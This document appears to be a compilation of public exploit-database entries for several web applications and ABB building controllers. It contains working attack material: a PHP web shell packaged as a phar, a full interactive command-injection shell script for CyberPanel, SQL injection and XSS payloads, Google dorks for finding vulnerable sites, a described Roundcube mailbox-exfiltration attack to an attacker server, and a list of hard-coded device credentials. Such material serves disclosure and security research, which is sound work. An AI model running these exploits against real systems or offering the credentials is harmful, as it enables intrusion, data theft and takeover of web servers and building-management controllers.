# Exploit Title: GetSimpleCMS 3.3.16 - Remote Code Execution (RCE)
# Date: 2024-10-26
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/GetSimpleCMS/GetSimpleCMS
# Software Link: https://github.com/GetSimpleCMS/GetSimpleCMS
# Version: 3.3.16
# Tested on: Ubuntu, Windows
# CVE : CVE-2021-28976
PoC-1:
1)Create a .phar file.
1. Create the PHP script: save the following one-line web shell as index.php (it runs whatever is passed in the cmd query parameter): <?php echo shell_exec($_GET['cmd']); ?>
2. Write a PHP script to create the .phar file: Use the Phar class in PHP to package the index.php file into a .phar archive. Create a script named create_phar.php as follows:
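<?php
// Build archive.phar: a PHP archive whose stub runs the bundled index.php.
// PHP refuses to *create* phar archives while php.ini has phar.readonly=1
// (the default); that setting cannot be flipped from inside the script, so
// bail out early with the command line that works instead of failing later
// inside the Phar constructor.
if (ini_get('phar.readonly')) {
    fwrite(STDERR, "phar.readonly is enabled; run: php -d phar.readonly=0 create_phar.php\n");
    exit(1);
}
// file_get_contents() on a missing file returns false and would silently
// produce an empty index.php inside the archive.
if (!is_file('index.php')) {
    fwrite(STDERR, "index.php not found in the current directory\n");
    exit(1);
}
try {
    // Initialize a new Phar object, name it "archive.phar"
    $phar = new Phar('archive.phar');
    // Buffer all changes so the archive is written once, at stopBuffering()
    $phar->startBuffering();
    // Package index.php inside the archive
    $phar->addFromString('index.php', file_get_contents('index.php'));
    // Set the stub (entry point): the default stub runs index.php whenever
    // the archive itself is executed as PHP
    $phar->setStub($phar->createDefaultStub('index.php'));
    $phar->stopBuffering();
    echo "Phar archive created successfully!";
} catch (Exception $e) {
    echo "Error: " . $e->getMessage();
}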
3. Run the script to generate the .phar file: on a system with PHP installed, run `php create_phar.php`. PHP's default php.ini setting phar.readonly=1 forbids creating archives and makes the script fail with a "creating archive ... disabled by the php.ini setting phar.readonly" error; in that case run `php -d phar.readonly=0 create_phar.php` instead.
After running the script, you should find a file named archive.phar in your working directory.
2)Upload file:
1. Upload archive.phar through the upload function at http://getsimplecms/admin/upload.php. The page sits under /admin/, so an authenticated administrator session is presumably required; the flaw is the extension blacklist, not an authentication bypass.
2. The file is stored under http://getsimplecms/data/uploads/. On a server that executes .phar as PHP, the default stub runs the embedded index.php, so http://getsimplecms/data/uploads/archive.phar?cmd=id returns the output of `id`.
3)Details:
"Validation Mechanisms Before Patch": "File extension blacklist and MIME type blacklist were used but lacked specific filtering for 'phar' file types.",
"Bypass Technique": "Upload a 'phar' file, as it was not included in the original blacklist, which can be treated as a PHP archive by the server for remote code execution.",
"Request URL": "http://getsimplecms/admin/upload.php",
"Request Method": "POST",
"Request Parameters": {
"file": "<Malicious File>"
},
PoC-2:
1) Create exploit.phar as a bare tar archive containing one member, malicious.php. The line below shows the ustar header as extracted text followed by the member's content. No phar stub is needed: when the server hands the file to the PHP interpreter, the header bytes are emitted as literal output and the <?php ... ?> segment inside is executed.
malicious.php 0000644 0000000 0000000 00000000036 00000000000 010442 0 ustar 00 <?php system($_GET['cmd']); ?>
2)
1. Prepare the file exploit.phar as described above.
2. Send a POST request to http://getsimplecms/admin/upload.php with exploit.phar as the 'file' parameter.
3. Request http://getsimplecms/data/uploads/exploit.phar?cmd=id. If the server executes .phar files as PHP, the embedded system($_GET['cmd']) runs and the output of `id` appears in the response after the echoed tar header.
Replace the host name `getsimplecms` in the URLs above with the target's domain name.
# Exploit Title: CyberPanel 2.3.6 - Remote Code Execution (RCE)
# Date: 10/29/2024
# Exploit Author: Luka Petrovic (refr4g)
# Vendor Homepage: https://cyberpanel.net/
# Software Link: https://github.com/usmannasir/cyberpanel
# Version: 2.3.5, 2.3.6, 2.3.7 (before patch)
# Tested on: Ubuntu 20.04, CyberPanel v2.3.5, v2.3.6, v2.3.7 (before patch)
# CVE: CVE-2024-51378
# PoC Repository: https://github.com/refr4g/CVE-2024-51378
# Blog Post: https://refr4g.github.io/posts/cyberpanel-command-injection-vulnerability/
#!/usr/bin/python3
import argparse
import httpx
import sys
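RED = "\033[91m"
GREEN = "\033[92m"
CYAN = "\033[96m"
MAGENTA = "\033[95m"
YELLOW = "\033[93m"
RESET = "\033[0m"

print(f"{RED}CVE-2024-51378{RESET} - Remote Code Execution Exploit")
print(f"{CYAN}Author:{RESET} {GREEN}Luka Petrovic (refr4g){RESET}")
print()

# The two views whose "statusfile" JSON field this script injects into;
# anything else is rejected before a request is sent.
allowed_endpoints = ["/ftp/getresetstatus", "/dns/getresetstatus"]

parser = argparse.ArgumentParser()
parser.add_argument("target", help=f"{CYAN}Target URL (with http/https prefix){RESET}")
parser.add_argument("endpoint", help=f"{CYAN}Endpoint to target, choose from {allowed_endpoints}{RESET}")
args = parser.parse_args()

if args.endpoint not in allowed_endpoints:
    print(f"{RED}Error: Invalid endpoint '{args.endpoint}'.{RESET}")
    parser.print_help()
    sys.exit(1)

target = args.target
endpoint = args.endpoint

# verify=False disables TLS certificate validation for every request this
# client makes (CyberPanel installs commonly run on self-signed certificates).
client = httpx.Client(base_url=target, verify=False)

# Reachability probe. httpx.HTTPError is the common base of RequestError
# (connection/timeout failures) and HTTPStatusError (raised by
# raise_for_status() on 4xx/5xx); catching only RequestError would let a
# 5xx landing page escape as an uncaught traceback instead of this message.
try:
    response = client.get("/")
    response.raise_for_status()
except httpx.HTTPError:
    print(f"{RED}Error: Unable to reach the target {target}. Please check the URL and your connection.{RESET}")
    sys.exit(1)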
def get_token():
    """Fetch the landing page and return the ``csrftoken`` cookie it sets.

    Returns None when the response carries no such cookie. Uses the
    module-level ``client`` so the request goes to the configured target.
    """
    landing = client.get("/")
    token = landing.cookies.get("csrftoken")
    return token
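def rce(client, csrf_token, cmd, endpoint):
    """Send one shell command through the ``statusfile`` injection and return the reply.

    Parameters
    ----------
    client : httpx.Client (any object exposing ``base_url`` and ``request()``)
        Session bound to the target; its base_url is echoed back as the Referer.
    csrf_token : str
        Value of the ``csrftoken`` cookie, sent in the ``X-CSRFToken`` header.
    cmd : str
        Shell command. It is wrapped as ``"; <cmd>; #"`` so it terminates whatever
        command the server builds around ``statusfile`` and comments out the rest.
    endpoint : str
        One of the vulnerable views, e.g. ``/ftp/getresetstatus``.

    Returns
    -------
    The ``requestStatus`` field of the JSON reply (the command output), the whole
    decoded reply if it is not a JSON object, or the raw response text when the
    reply is not JSON at all (e.g. an HTML error page).
    """
    headers = {
        "X-CSRFToken": csrf_token,
        "Content-Type": "application/json",
        "Referer": str(client.base_url),
    }
    # Let the client serialise the body: assembling the JSON by string
    # formatting breaks as soon as cmd contains a double quote or backslash.
    body = {"statusfile": f"; {cmd}; #"}
    response = client.request("OPTIONS", endpoint, headers=headers, json=body)
    try:
        reply = response.json()
    except ValueError:
        return response.text
    return reply.get("requestStatus") if isinstance(reply, dict) else reply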
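csrf_token = get_token()
if not csrf_token:
    print(f"{RED}Failed to retrieve CSRF token. Exiting.{RESET}")
    sys.exit(1)

# Interactive loop: every line typed is sent as one injected shell command.
# Ctrl-D / Ctrl-C end the session cleanly instead of dumping a traceback.
while True:
    try:
        cmd = input(f"{YELLOW}$> {RESET}")
    except (EOFError, KeyboardInterrupt):
        print()
        break
    if not cmd.strip():
        # Nothing to run; an empty line would only send "; ; #".
        continue
    print(rce(client, csrf_token, cmd, endpoint))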
# Exploit Title: MagnusSolution magnusbilling 7.3.0 - Command Injection
# Date: 2024-10-26
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/magnussolution/magnusbilling7
# Software Link: https://github.com/magnussolution/magnusbilling7
# Version: 7.3.0
# Tested on: Centos
# CVE : CVE-2023-30258
# PoC URL for Command Injection
http://magnusbilling/lib/icepay/icepay.php?democ=testfile;%20id%20%3E%20/tmp/injected.txt
(the democ value is shown URL-encoded; decoded it is `testfile; id > /tmp/injected.txt`)
Result: this PoC injects the id command. If the injection succeeds, the command runs on the server and its output is written to /tmp/injected.txt on the host; the HTTP response itself gives no indication, so verify on the target or use a command with an externally observable effect (for example a DNS or HTTP request to a host you control).
Replace the host name `magnusbilling` in the URL above with the target's domain name.
# Exploit Title: RosarioSIS 7.6 - SQL Injection
# Date: 2024-10-26
# Exploit Author: CodeSecLab
# Vendor Homepage: https://gitlab.com/francoisjacquet/rosariosis
# Software Link: https://gitlab.com/francoisjacquet/rosariosis
# Version: 7.6
# Tested on: Ubuntu, Windows
# CVE : CVE-2021-44567
PoC:
POST /ProgramFunctions/PortalPollsNotes.fnc.php HTTP/1.1
X-Requested-With: XMLHttpRequest
Constraints and relevant control flow in PortalPollsNotes.fnc.php (the request must be a POST whose votes parameter is an array, and it must carry the X-Requested-With: XMLHttpRequest header, otherwise the chain below never reaches the vulnerable call):
isset( $_POST['votes'] ) && is_array( $_POST['votes'] ) && $_SERVER['HTTP_X_REQUESTED_WITH'] == 'XMLHttpRequest' && foreach ( (array) $_POST['votes'] as $poll_id => $votes_array ) && if ( ! empty( $votes_array ) ) && PortalPollsVote( $poll_id, $votes_array )
Form body (URL-encode it when sending): votes['; CREATE TABLE aaa(t text) --]=1
The injection sits in the array key, which reaches PortalPollsVote() as $poll_id. This payload assumes the database layer executes stacked statements; against a real target prefer a non-destructive probe (for example a time delay) over creating tables.
# Exploit Title: LearnPress WordPress LMS Plugin 4.2.7 - SQL Injection
# Google Dork: inurl:"/wp-json/learnpress/v1/" OR inurl:"/wp-content/plugins/learnpress/" OR "powered by LearnPress" AND "version 4.2.7"
# Date: [Current Date, e.g., October 30, 2024]
# Exploit Author: [Your Name or Username]
# Vendor Homepage: https://thimpress.com/learnpress/
# Software Link: https://wordpress.org/plugins/learnpress/
# Version: <= 4.2.7
# Tested on: WordPress 6.x, Ubuntu 22.04
# CVE : CVE-2024-8522
CVE-2024-8522 - SQL Injection in LearnPress WordPress Plugin (Python exploit)
Overview
CVE: CVE-2024-8522
Plugin: LearnPress – WordPress LMS Plugin (version <= 4.2.7)
Type: SQL Injection
Impact: High
Affected Component: Unauthenticated endpoint parameter c_only_fields in LearnPress API
Description
The vulnerability exists in the LearnPress WordPress plugin, versions up to 4.2.7. An unauthenticated SQL Injection flaw is present in the c_only_fields parameter of the LearnPress API endpoint. This flaw allows attackers to execute arbitrary SQL commands by manipulating API requests without authentication. If exploited, this could lead to unauthorized database access, potentially exposing sensitive data or even allowing administrative control through database manipulation.
Affected Code Path
The vulnerability is triggered by accessing the LearnPress API and injecting SQL commands through the c_only_fields parameter. Below is the code path leading to this vulnerability:
plaintext
class-lp-db.php:702, LP_Database->execute()
class-lp-course-db.php:564, LP_Course_DB->get_courses()
Courses.php:241, LearnPress\Models\Courses::get_courses()
class-lp-rest-courses-v1-controller.php:502, LP_Jwt_Courses_V1_Controller->get_courses()
class-wp-rest-server.php:1230, WP_REST_Server->respond_to_request()
class-wp-rest-server.php:1063, WP_REST_Server->dispatch()
Proof of Concept (PoC)
The vulnerability can be demonstrated by sending a request to the API endpoint with a malicious payload in the c_only_fields parameter (URL-encode the value on the wire; the request below is shown decoded for readability). The example injects a conditional SQL expression that makes the database pause, so a response delayed by roughly ten seconds indicates that the expression was evaluated:
http
GET /wp-json/learnpress/v1/courses?c_only_fields=IF(COUNT(*)!=-2,(SLEEP(10)),0) HTTP/1.1
Host: targetwebsite.com
User-Agent: curl/7.81.0
Accept: */*
Exploitation Script
The following Python script automates the process of sending malicious requests to test for this SQL injection vulnerability by measuring response time, indicating potential success if there is a delay.
python
import requests
import time
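# Target URL for the API endpoint (replace the host with a system you are authorised to test)
url = 'http://targetwebsite.com/wp-json/learnpress/v1/courses'

# Seconds each payload asks MySQL to SLEEP(); the detection threshold is derived
# from this value so the two cannot drift apart.
SLEEP_SECONDS = 10

# (payload, whether a delay is EXPECTED when the injection works).
# The 1=2 entry is the control: it must return promptly. A delay on it means a
# slow target, not a successful injection.
payloads = [
    (f"IF(COUNT(*) > 0, SLEEP({SLEEP_SECONDS}), 0)", True),   # Test for successful injection
    (f"IF(1=1, SLEEP({SLEEP_SECONDS}), 0)", True),            # Basic true condition
    (f"IF(1=2, SLEEP({SLEEP_SECONDS}), 0)", False),           # Basic false condition (control)
]

# Iterate over payloads and measure response time
for payload, expect_delay in payloads:
    params = {'c_only_fields': payload}   # requests URL-encodes the value
    start_time = time.monotonic()         # monotonic: immune to wall-clock jumps
    try:
        # Send request to the vulnerable endpoint. Without a timeout a hung
        # connection blocks forever; SLEEP() may fire once per row the query
        # touches, so allow a few multiples of the requested delay.
        response = requests.get(url, params=params, timeout=SLEEP_SECONDS * 3)
    except requests.exceptions.RequestException as e:
        print(f"Error during request: {e}")
        continue
    # Calculate response time
    response_time = time.monotonic() - start_time
    delayed = response_time >= SLEEP_SECONDS
    # Display result
    print(f"Payload: {payload} | Status Code: {response.status_code} | Response Time: {response_time:.2f} seconds")
    # A delay is only evidence when the payload was supposed to produce one.
    if delayed and expect_delay:
        print("Potential SQL Injection vulnerability detected (delay observed).")
    elif delayed:
        print("Delay observed on the control payload; the target is slow or rate-limited, not necessarily injectable.")
    elif expect_delay:
        print("No delay observed; injection may be unsuccessful.")
    else:
        print("Control payload returned promptly, as expected.")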
Google Dorks for Identifying Vulnerable Sites
To locate potentially vulnerable websites running LearnPress, the following Google dorks can help identify sites with the plugin:
inurl:"/wp-content/plugins/learnpress/"
inurl:"/wp-json/learnpress/v1/"
"powered by LearnPress" AND "version 4.2.7"
inurl:"/wp-content/plugins/learnpress/assets/js/"
"LearnPress" AND "WordPress LMS Plugin"
Disclaimer: Use of these dorks should only be conducted in an ethical manner, with proper permissions for testing on identified sites.
Impact Analysis
If exploited, this SQL Injection vulnerability can have severe impacts, including:
Data Breach: Unauthorized access to sensitive data within the WordPress database, such as user credentials, course data, and personal information.
Privilege Escalation: An attacker may leverage the SQL injection to modify database entries, potentially elevating user roles and gaining administrative access.
Site Defacement or Service Disruption: By altering content or database configurations, attackers can disrupt service availability or deface the website.
Recommendations
Immediate Update: update LearnPress to a release newer than 4.2.7 (the affected range stated above). Until that is done, consider restricting unauthenticated access to the /wp-json/learnpress/v1/ routes at the web server or WAF.
Web Application Firewall (WAF): Employ a WAF that can filter and block malicious SQL injection attempts.
Least Privilege Access: Configure database users with the minimum necessary privileges to reduce potential impacts.
Conclusion
The SQL Injection vulnerability in LearnPress (<= 4.2.7) is a high-severity issue that exposes affected WordPress sites to data breaches, privilege escalation, and potential service disruption. It is crucial for site administrators using this plugin to update to a secure version and implement protective measures.
This report summarizes the vulnerability, exploitation methods, and recommendations to mitigate risks associated with CVE-2024-8522.
# Exploit Title: Roundcube Webmail 1.6.6 - Stored Cross Site Scripting (XSS)
# Google Dork:
# Exploit Author: AmirZargham
# Vendor Homepage: https://roundcube.net/ (Roundcube - Free and Open Source Webmail Software)
# Software Link: https://github.com/roundcube/roundcubemail/releases
# Version: Roundcube client version earlier than 1.5.6 or from 1.6 to 1.6.6.
# Tested on: firefox,chrome
# CVE: CVE-2024-37383
# CWE: CWE-79
# Platform: MULTIPLE
# Type: WebApps
Description:
The CVE-2024-37383 vulnerability was discovered in the Roundcube Webmail email client. This is a stored XSS vulnerability that allows an attacker to execute JavaScript code in the context of the user's webmail session. To trigger it, all the victim needs to do is open a malicious email in a Roundcube client version earlier than 1.5.6, or from 1.6 up to and including 1.6.6.
Usage Info:
1 - Open Roundcube_mail_server_exploit_for_CVE-2024-37383.txt and export the JavaScript file.
2 - Change the web address of the original email (target) and the URL of the receiving server (attacker server).
3 - Put the code in an SVG <animate> tag and send it to the target mailbox (the helper at https://github.com/bartfroklage/CVE-2024-37383-POC can be used).
4 - After the victim clicks, all emails in the mailbox are sent to your collaborator server.
This code automates the process of retrieving every message in the inbox from a Roundcube webmail server and forwarding that data to a specific collaborator server endpoint. Here is a step-by-step breakdown:
-
Setup URLs:
- The main webmail URL (target) and the receiving server URL (attackerserver) are defined as variables at the beginning for easy configuration.
-
Get Total Page Count:
- The getPageCount function sends a GET request to the main webmail URL to fetch metadata, including the total number of pages (pagecount).
- If pagecount is found, it proceeds to loop through each page.
-
Fetch Message IDs from All Pages:
- For each page from 1 to pagecount, it constructs a paginated URL to request that page.
- Each page’s response is checked for instances of add_message_row(NUMBER) using regex, extracting message IDs from each instance and collecting all IDs in a single list.
-
Retrieve Each Message's Content:
- For each message ID, the code constructs a URL to request detailed data about that message.
- It sends a GET request for each message ID URL, receiving the full response HTML.
-
Extract and Clean Message Data:
- Within each message response, it uses regex to capture the <title> (message title) and main message content.
- Any HTML tags are stripped from the message content to keep only the plain text.
-
Send the Data to the Server:
- For each extracted message, a POST request is made to the server endpoint with the title and cleaned message content, URL-encoded for proper transmission.
# Exploit Title: MiniCMS 1.1 - Cross Site Scripting (XSS)
# Date: 2024-10-26
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/bg5sbk/MiniCMS
# Software Link: https://github.com/bg5sbk/MiniCMS
# Version: 1.10
# Tested on: Ubuntu, Windows
# CVE : CVE-2018-1000638
PoC:
GET http://minicms/mc-admin/page.php?date=\"><script>alert('XSS')</script>
"Sink": "echo $filter_date;", "Vulnerable Variable": "filter_date", "Source": "GET parameter 'date'", "Sanitization Mechanisms Before Patch": "None (directly echoed without encoding)", "Sink Context Constraints": "Injected in HTML attribute (URL query string)", "Attack Payload": ""><script>alert('XSS')</script>", "Execution Path Constraints": "The 'date' GET parameter must be set in the URL query string and passed without filtering", "Request URL": "http://minicms/mc-admin/page.php?date=%22%3E%3Cscript%3Ealert(%27XSS%27)%3C/script%3E", "Request Parameter":"date","Request Method": "GET", "Final PoC": "http://minicms/mc-admin/page.php?date=\"><script>alert('XSS')</script>"
Replace the host name `minicms` in the URLs above with the target's domain name.
# Exploit Title: NEWS-BUZZ News Management System 1.0 - SQL Injection
# Google Dork: N/A
# Exploit Author: egsec
# Date: 2024-11-03
# Vendor Homepage: https://code-projects.org
# Software Link: https://code-projects.org/content-management-system-in-php-with-source-code-2/
# Version: 1.0
# Tested on: Windows 11 Pro
# Impact: Attacker-controlled input in the user_name parameter is interpolated unescaped into a SQL query, leading to SQL injection
# CVE : CVE-2024-10758
## Vulnerability Description:
There is a SQL injection vulnerability in the login handler (login.php, which processes the form served by index.php). It allows an attacker to manipulate the SQL query and potentially perform unauthorized actions on the database.
## Vulnerable code section:
In the source code, you can find vulnerable code in the NEWS-BUZZ/login.php file:
<?php
...
$query = "SELECT * FROM users WHERE username = '$username'";
$result = mysqli_query($conn, $query) or die(mysqli_error($conn));
...
?>
In this line, the $username variable is embedded directly into the SQL query without any escaping or parameter binding, so attacker-controlled input changes the structure of the query. The fix is a prepared statement (mysqli_prepare with a bound parameter) rather than string interpolation.
## Proof of Concept (PoC):
1.Location: http://localhost/NEWS-BUZZ/index.php
2.Time-Based SQL Injection Payload: ' OR sleep(10)#
3.PoC request:
POST /NEWS-BUZZ/login.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 69
Origin: http://localhost
Connection: close
Referer: http://localhost/NEWS-BUZZ/index.php
Cookie: PHPSESSID=456n0gcbd6d09ecem39lrh3nu9
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
user_name=admin%27+or+sleep%2810%29%23&user_password=adminpass&login=
4.PoC response:
The response is delayed: sleep(10) is evaluated as part of the WHERE clause, so the server answers roughly 10 seconds later (a multiple of that if the users table holds several rows, since MySQL evaluates the OR branch for every row whose username does not match).
ABB Cylon Aspect 3.07.02 (userManagement.php) - Weak Password Policy
Vendor: ABB Ltd.
Product web page: https://www.global.abb
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
Firmware: <=3.07.02
Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.
Desc: The ABB BMS/BAS controller suffers from a weak password policy, allowing
users to set overly simplistic or blank passwords and usernames without restrictions.
This vulnerability significantly reduces account security, enabling attackers
to exploit weak credentials for unauthorized access to the system. The form
below demonstrates it by submitting a new user "admin2" with the one-character
password "7" to userManagement.php; the advisory does not state whether that
endpoint requires an authenticated session, so treat this as a password-policy
weakness rather than an authentication bypass.
Tested on: GNU/Linux 3.15.10 (armv7l)
GNU/Linux 3.10.0 (x86_64)
GNU/Linux 2.6.32 (x86_64)
Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
PHP/7.3.11
PHP/5.6.30
PHP/5.4.16
PHP/4.4.8
PHP/5.3.3
AspectFT Automation Application Server
lighttpd/1.4.32
lighttpd/1.4.18
Apache/2.2.15 (CentOS)
OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
ErgoTech MIX Deployment Server 2.0.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2024-5898
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5898.php
CVE ID: CVE-2024-48845
CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-48845
21.04.2024
P R O J E C T
.|
| |
|'| ._____
___ | | |. |' .---"|
_ .-' '-. | | .--'| || | _| |
.-'| _.| | || '-__ | | | || |
|' | |. | || | | | | || |
____| '-' ' "" '-' '-.' '` |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░
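<html>
<!-- PoC for the weak password policy: submitting this form sends a user-creation
     request to userManagement.php with the one-character password "7" for a new
     account "admin2". Replace 192.168.73.31 with the controller you are authorised
     to test. Whether the endpoint needs an existing session is not stated in the
     advisory; the point demonstrated is that the password is accepted. -->
<body>
<form action="http://192.168.73.31/userManagement.php" method="POST">
<input type="hidden" name="USER" value="admin2" />
<input type="hidden" name="PASSWORD" value="7" />
<input type="hidden" name="ACTION" value="Add" />
<input type="submit" value="Setirkaj." />
</form>
</body>
</html>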
ABB Cylon Aspect 3.08.03 Hard-coded Secrets
Vendor: ABB Ltd.
Product web page: https://www.global.abb
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
Firmware: <=3.08.03
Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.
Desc: The ABB Cylon Aspect BMS/BAS controller contains multiple instances
of hard-coded credentials, including usernames, passwords, and encryption
keys embedded in various java classes (listed below by class name). Because
they are compiled into the shipped class files, the values are identical on
every deployment and cannot be rotated by operators; anyone able to obtain
the firmware or the class files can recover them. This practice poses
significant security risks, allowing attackers to gain unauthorized access
and compromise the system's integrity.
Tested on: GNU/Linux 3.15.10 (armv7l)
GNU/Linux 3.10.0 (x86_64)
GNU/Linux 2.6.32 (x86_64)
Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
PHP/7.3.11
PHP/5.6.30
PHP/5.4.16
PHP/4.4.8
PHP/5.3.3
AspectFT Automation Application Server
lighttpd/1.4.32
lighttpd/1.4.18
Apache/2.2.15 (CentOS)
OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
ErgoTech MIX Deployment Server 2.0.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2025-5896
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5896.php
21.04.2024
--
$ cat project
P R O J E C T
.|
| |
|'| ._____
___ | | |. |' .---"|
_ .-' '-. | | .--'| || | _| |
.-'| _.| | || '-__ | | | || |
|' | |. | || | | | | || |
____| '-' ' "" '-' '-.' '` |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░
$ cat secrets.txt
- SynchronizedSecurityServicesHandler.class -> CrET8MEbraME4ahu
- MapInvisibleSchedule.class -> calendar:user
- WDSupervisor.class -> aamservletuser:kakideco
- AESCipher2.class -> uajo4nzibb$#1E4V5262b17f-c3d5-4190-a442-6d251f9da52b
- AESCipher.class -> default
- BrokerURL.class -> aamuser:default
- Schedule.class -> calendar:user
- BfUtils.class -> CrET8MEbraME4ahu
- Context.class -> \037jchabucos:friske
- Db.class -> matrixac1:aam
ABB Cylon Aspect 3.08.03 (MapServicesHandler) - Authenticated Reflected XSS
Vendor: ABB Ltd.
Product web page: https://www.global.abb
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
Firmware: <=3.08.03
Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.
Desc: The ABB BMS/BAS controller suffers from an authenticated reflected
cross-site scripting vulnerability. Input passed to GET parameters of the
MapServices servlet is not properly sanitised before being returned to the
user. Note that this description names the parameters 'name' and 'id', while
the proof-of-concept URLs below exercise 'cmd' and 'id'; confirm the parameter
names against the tested firmware. This can be exploited to execute arbitrary
HTML/JS code in a user's browser session in context of an affected site.
Tested on: GNU/Linux 3.15.10 (armv7l)
GNU/Linux 3.10.0 (x86_64)
GNU/Linux 2.6.32 (x86_64)
Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
PHP/7.3.11
PHP/5.6.30
PHP/5.4.16
PHP/4.4.8
PHP/5.3.3
AspectFT Automation Application Server
lighttpd/1.4.32
lighttpd/1.4.18
Apache/2.2.15 (CentOS)
OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
ErgoTech MIX Deployment Server 2.0.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2025-5897
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5897.php
21.04.2024
